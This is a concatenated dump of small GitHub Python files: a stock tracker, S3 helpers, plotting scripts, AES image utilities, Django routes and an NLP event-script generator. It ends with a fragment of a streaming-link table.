forward_pe,\n \t\"ma50\" : ma50,\n \t\"ma200\" : ma200\n })\n\n\n#logic references yhoo finance\ndef fetch_stock_data(id: int):\n\tdb = SessionLocal()\n\tstock = db.query(Stocks).filter(Stocks.id == id).first()\n\n\tyahoo_data = yfinance.Ticker(stock.symbol)\n\tyahoo_data = yfinance.Ticker(stock.name)\n\tstock.ma200 = yahoo_data.info['twoHundredDayAverage']\n\tstock.ma50 = yahoo_data.info['fiftyDayAverage']\n\tstock.price = yahoo_data.info['previousClose']\n\tstock.forward_pe = yahoo_data.info['forwardPE']\n\tstock.forward_eps = yahoo_data.info['forwardEps']\n\t\n\tif yahoo_data.info['dividendYield'] is not None:\n\t\tstock.dividend_yield = yahoo_data.info['dividendYield'] * 100\n\n\tdb.add(stock)\n\tdb.commit()\n\n\n#Creates a stock and stores in database\n@app.post(\"/stock\")\nasync def create_stock(stock_request: StockRequest, background_tasks: BackgroundTasks, db: Session = Depends(get_db)):\n\tstock = Stocks()\n\tstock.symbol = stock_request.symbol\n\n\tdb.add(stock)\n\tdb.commit()\n\n\tbackground_tasks.add_task(fetch_stock_data, stock.id)\n\n\n\n\n\treturn {\n\t\t\"code\": \"success\",\n\t\t\"message\" : \"stock created\"\n\t}\n\n","repo_name":"juanfp900/StockTracker","sub_path":"StockTracker.py","file_name":"StockTracker.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"34169859098","text":"import os\nimport io\nimport glob\nimport logging\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom utils import get_datalake_raw_layer_path, get_datalake_bucket_name\n\n\ndef create_bucket(bucket_name, region=None):\n try:\n if region is None:\n s3_client = boto3.client(\"s3\")\n s3_client.create_bucket(Bucket=bucket_name)\n\n else:\n s3_client = boto3.client(\"s3\", region_name=region)\n location = {\"LocationConstraint\": region}\n s3_client.create_bucket(Bucket=bucket_name, CreateBucketConfiguration=location)\n\n except ClientError as e:\n logging.error(e, exc_info=True)\n return False\n\n return True\n\n\ndef list_buckets():\n s3 = boto3.client(\"s3\")\n response = s3.list_buckets()\n\n for bucket in response['Buckets']:\n print(bucket[\"Name\"])\n\n\ndef download_file(bucket, src, dst):\n s3 = boto3.client(\"s3\")\n s3.download_file(bucket, src, dst)\n\n\ndef download_file_memory(bucket, src):\n s3 = boto3.client(\"s3\")\n io_stream = io.BytesIO()\n s3.download_fileobj(bucket, src, io_stream)\n io_stream.seek(0) #cursor 리셋.\n return io_stream.read().decode(\"utf-8\")\n\n\ndef upload_file(src, bucket, dst=None):\n if dst is None:\n dst = os.path.basename(src)\n\n s3_client = boto3.client(\"s3\")\n\n try:\n s3_client.upload_file(src, bucket, dst)\n except ClientError as e:\n logging.error(e, exc_info=True)\n return False\n return True\n\n\ndef upload_file_memory(io_stream, bucket, dst):\n s3_client = boto3.client(\"s3\")\n try:\n s3_client.upload_fileobj(io_stream, bucket, dst)\n\n except ClientError as e:\n logging.error(e, exc_info=True)\n return False\n\n return True\n\n\nif __name__ == '__main__':\n #bucket = \"aws-cli-test-wooram\"\n #create_bucket(\"aws-sdk-test-wooram\")\n #list_buckets()\n #download_file(\"aws-cli-test-wooram\", \"cli/data1.txt\", \"./data/data1.txt\")\n #data = download_file_memory(\"aws-cli-test-wooram\", \"cli/data1.txt\")\n #print(data)\n\n #upload_file(\"./data/data1.txt\", bucket, \"sdk/data1.txt\")\n '''\n with open(\"./data/data1.txt\", \"rb\") as f:\n upload_file_memory(f, bucket, \"sdk/data1_stream.txt\")\n '''\n\n bucket_name = get_datalake_bucket_name(\n layer=\"raw\",\n company=\"de403\",\n region=\"apnortheast2\",\n account=\"073658113926\",\n env=\"dev\"\n )\n #create_bucket(bucket_name=bucket_name, region=\"ap-northeast-2\")\n\n files = glob.glob(\"./data/*.json\")\n dst = get_datalake_raw_layer_path(\n source=\"local\",\n source_region=\"apnortheast2\",\n table=\"bike-data\",\n year=2023, month=8, day=2, hour=11\n )\n for f in files:\n upload_file(src=f,\n bucket=bucket_name,\n dst=f\"{dst}/{os.path.basename(f)}\"\n )\n \n","repo_name":"gkdnfka/DE_Lecture_Practice","sub_path":"s3_practice/s3_exam.py","file_name":"s3_exam.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41460751629","text":"import cong_plot\nimport numpy as np\nimport process_trace\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nimport sys\nfrom cong_plot import ThroughputByFlowData\nfrom .. import queue_manager\n\nrate_list = [\"0.5\", \"0.7\", \"0.9\", \"1.1\", \"1.3\", \"1.5\", \"1.7\", \"2.0\"]\n\nclass FairnessPlot(object):\n def __init__(self, topo_str, traff_str):\n self.traff_str = traff_str\n self.topo_str = topo_str\n self.topo_traff_str = self.topo_str + self.traff_str\n self.rates = cong_plot.rates_dic[self.topo_traff_str]\n self.rate_values = [float(entry) for entry in self.rates]\n\n #self.rates = cong_plot.rates_dic[topo_traff_str]\n self.exp_list = ['PerFlow', 'PerIf', 'PerIfWithECN']\n #self.exp_list = ['PerIf']\n\n def plotJain(self):\n # plot jain's fairness index, across different rates\n # http://people.duke.edu/~ccc14/pcfb/numpympl/MatplotlibBarPlots.html\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n # get the hop count first\n hop_file = '{}{}.hop'.format(cong_plot.trace_topo_path, self.topo_str)\n hop_count = {}\n with open(hop_file, 'r') as f:\n for row in f:\n words = row.split(',')\n flow = queue_manager.Flow(words[0], words[1])\n hop_count[flow.hashKey()] = int(words[2])\n\n num_rates = len(self.rates)\n xpos = np.arange(num_rates)\n width = 0.25\n\n fair_ind = {} # { exp : [] }\n for exp_pos in xrange(len(self.exp_list)):\n exp = self.exp_list[exp_pos]\n jain_list = []\n for rate_pos in xrange(num_rates):\n rate = self.rates[rate_pos]\n file_path = '{}respTimes_{}_{}.csv'.format(cong_plot.trace_base_path,\n exp, rate)\n thru_data = ThroughputByFlowData(file_path)\n flow_thru = thru_data.hopWeightedAvgThru(hop_count)\n #flow_thru = thru_data.avgFlowThruData()\n\n jain_list.append(self.computeJainIndex(flow_thru))\n #fair_ind[exp] = jain_list\n ax.bar(xpos+exp_pos*width, jain_list, width, color=cong_plot.color_iter.next(), label=exp)\n\n cong_plot.labelPlot('Offered load for each (src, dst) pair', 'Jain\\'s index', '', 'lower left')\n x_tick_marks = self.rates\n ax.set_xticks(xpos + width)\n ax.set_xticklabels(x_tick_marks)\n #plt.axis([0, 20, 0, 1])\n plt.show()\n\n def computeJainIndex(self, flow_thru_list):\n dividend = sum(flow_thru_list) ** 2\n divisor = len(flow_thru_list) * sum([thru ** 2 for thru in flow_thru_list])\n return (dividend / divisor)\n\nif __name__ == \"__main__\":\n topo_str = 'Abilene'\n #traff_str = 'Equal'\n traff_str = 'Full'\n\n #topo_str = 'Small9'\n p = FairnessPlot(topo_str, traff_str)\n p.plotJain()","repo_name":"kais66/cong-simu","sub_path":"plot/fair.py","file_name":"fair.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"74007776275","text":"\nimport struct\n\nfrom hashlib import sha1\nfrom zlib import adler32\n\nfrom Crypto.Cipher import AES\n\n\ndef readBinaryFile(path):\n with open(path, 'rb') as f:\n return f.read()\n\n\ndef writeBinaryFile(path, data):\n with open(path, 'wb') as f:\n f.write(data)\n\n\ndef doAES(mode, aes_type, data, iv, key):\n if isinstance(aes_type, str):\n aes_type = int(aes_type)\n\n if isinstance(iv, str):\n iv = bytes.fromhex(iv)\n\n if isinstance(key, str):\n key = bytes.fromhex(key)\n\n iv_len = len(iv)\n key_len = len(key)\n\n if iv_len != 16:\n raise Exception(f'Bad iv length: {iv_len}')\n\n if key_len < 16:\n raise Exception(f'Bag key length: {key_len}')\n\n if aes_type == 128:\n if key_len > 16:\n key = key[16:]\n\n elif aes_type == 192:\n if key_len > 24:\n key = key[24:]\n\n elif aes_type == 256:\n if key_len > 32:\n key = key[32:]\n\n else:\n raise Exception(f'Unknown AES type: {aes_type}')\n\n cipher = AES.new(key, AES.MODE_CBC, iv)\n\n if mode == 'encrypt':\n data = cipher.encrypt(data)\n\n elif mode == 'decrypt':\n data = cipher.decrypt(data)\n\n else:\n raise Exception(f'Unknown mode: {mode}')\n\n return data\n\n\ndef getKernelChecksum(data):\n return adler32(data)\n\n\ndef getSHA1(data):\n return sha1(data).hexdigest()\n\n\ndef getBufferAtIndex(data, index, length):\n buffer = data[index:index+length]\n\n buffer_len = len(buffer)\n\n if buffer_len != length:\n raise Exception(f'Buffer length mismatch! Got {buffer_len}')\n\n return buffer\n\n\ndef formatData(format, data, pack=True):\n formatted_data = None\n\n # Use \"*\" if we are given a list/tuple\n unpack_var = False\n\n if isinstance(data, list) or isinstance(data, tuple):\n unpack_var = True\n\n if pack is True:\n if unpack_var:\n formatted_data = struct.pack(format, *data)\n else:\n formatted_data = struct.pack(format, data)\n\n elif pack is False:\n if unpack_var:\n formatted_data = struct.unpack(format, *data)\n else:\n formatted_data = struct.unpack(format, data)\n else:\n raise ValueError(f'Expected pack as bool, got: {type(pack)}')\n\n return formatted_data\n\n\ndef padNumber(n):\n n_padded = n\n\n while n_padded % 16 != 0:\n n_padded += 1\n\n return n_padded\n\n\ndef pad(data):\n data_len = len(data)\n\n padding = padNumber(data_len) - data_len\n\n padded_data = data + (b'\\x00' * padding)\n\n return padded_data\n","repo_name":"Merculous/PyImg3lib","sub_path":"img3lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"35845828468","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\napp_name = 'annotation'\n\nurlpatterns = [\n #annotation \n path('/annotation-create/', views.annotation_create, name = 'url_annotation_create'),\n path('/list', views.annotations_list, name='url_annotations_list'),\n path('/detail', views.annotation_detail, name='url_annotation_detail'),\n path('/edit', views.annotation_edit, name='url_annotation_edit'),\n path('/delete', views.annotation_delete, name='url_annotation_delete'),\n path('delete_all/', views.annotation_delete_all, name='url_annotation_delete_all'),\n\n # URL PARA TRADUZIR O DATATABLES. USO GERAL\n path('annotation/translate-js/', views.translate_datables_js, name='url_translate_datables_js'),\n\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"massariolmc/Deal","sub_path":"annotation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"2597885845","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# Read csv into dataframe\ndf = pd.read_csv(\"results/model_results.csv\")\n\n# Accuracy graph\nplt.plot(df[\"train_accuracy\"], label = \"train accuracy\")\nplt.plot(df[\"test_accuracy\"], label = \"test accuracy\")\nplt.title(\"Model Accuracy\")\nplt.xlabel(\"Number of Epochs\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nplt.savefig(\"./graph/model_Accuracy.jpg\")\nplt.show()\n\n# Loss graph\nplt.plot(df[\"train_loss\"], label = \"train loss\")\nplt.plot(df[\"test_loss\"], label = \"test loss\")\nplt.title(\"Model Loss\")\nplt.xlabel(\"Number of Epochs\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.savefig(\"./graph/model_Loss.jpg\")\nplt.show()","repo_name":"GeorgeLuDev/MNIST-CNN","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"8852948223","text":"# -*- coding:utf-8 -*-\r\nimport pandas as pd\r\nfrom pandas.core.frame import DataFrame\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.font_manager as fm\r\nimport numpy as np\r\n\r\nfontFile = \"C:\\\\windows\\\\Fonts\\\\malgun.ttf\"\r\nfontName = fm.FontProperties(fname = fontFile, size = 50).get_name()\r\nplt.rc(\"font\",family=fontName) \r\n\r\nfor ii in range(2015,2021):\r\n df = pd.read_csv(\"D:/wodnd_file/buseoul%s.csv\"% ii,names=[\"년\",\"월\",\"일\",\"노선\",\"정류장\",\"탄\",\"내린\"])\r\n \r\n df2 = df[[\"월\",\"탄\"]]\r\n \r\n wc = {}\r\n for i in range(1,13):\r\n if i in wc:\r\n pass\r\n else:\r\n wc[i] = df2[df2['월']==i]['탄'].sum()\r\n \r\n month,count = [],[]\r\n \r\n for i,v in wc.items():\r\n month.append(i)\r\n count.append(v)\r\n \r\n busDF = DataFrame()\r\n busDF['월'] = month\r\n busDF['탄'] = count\r\n # print(busDF)\r\n \r\n busDF.to_csv(\"D:/wodnd_file/BusDF%s.csv\"% ii, index=False)\r\n print(ii)\r\nprint(\"끝\")\r\nplt.bar(busDF['월'], busDF['탄'])\r\nplt.show()\r\ndf.to_csv(\"D:/wodnd_file/Rcorona.csv\",header=False, index=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"wodnd2990/corona_project","sub_path":"project_corona_real2/P06_busDF_Year.py","file_name":"P06_busDF_Year.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"35387498276","text":"import argparse\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom common.event_script import Script, ScriptCorpus\nfrom data.document_reader import read_corenlp_doc\nfrom utils import smart_file_handler\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'input_path', help='directory to CoreNLP parsed xml files')\n parser.add_argument(\n 'output_path', help='path to write script corpus file')\n parser.add_argument(\n '-v', '--verbose', help='print all document names', action='store_true')\n\n args = parser.parse_args()\n\n input_files = sorted([\n join(args.input_path, f) for f in listdir(args.input_path)\n if isfile(join(args.input_path, f)) and f.endswith('xml.bz2')])\n\n script_corpus = ScriptCorpus()\n\n for input_f in input_files:\n doc = read_corenlp_doc(input_f, verbose=args.verbose)\n script = Script.from_doc(doc)\n if script.has_events():\n script_corpus.add_script(script)\n\n with smart_file_handler(args.output_path, 'w') as fout:\n fout.write(script_corpus.to_text())\n","repo_name":"pxch/event_imp_arg","sub_path":"scripts/generate_event_script.py","file_name":"generate_event_script.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"84"}
ColaboradorServidorAudioCalidadEnlace
\"carlosaugus22\"carlosaugus22\"vidxtreme.to\"/\n vidxtreme.to\"Latino\"\"TS\" TS
\"carlosaugus22\"carlosaugus22\"streamin.to\"/streamin.to\"Latino\"\"TS\" TS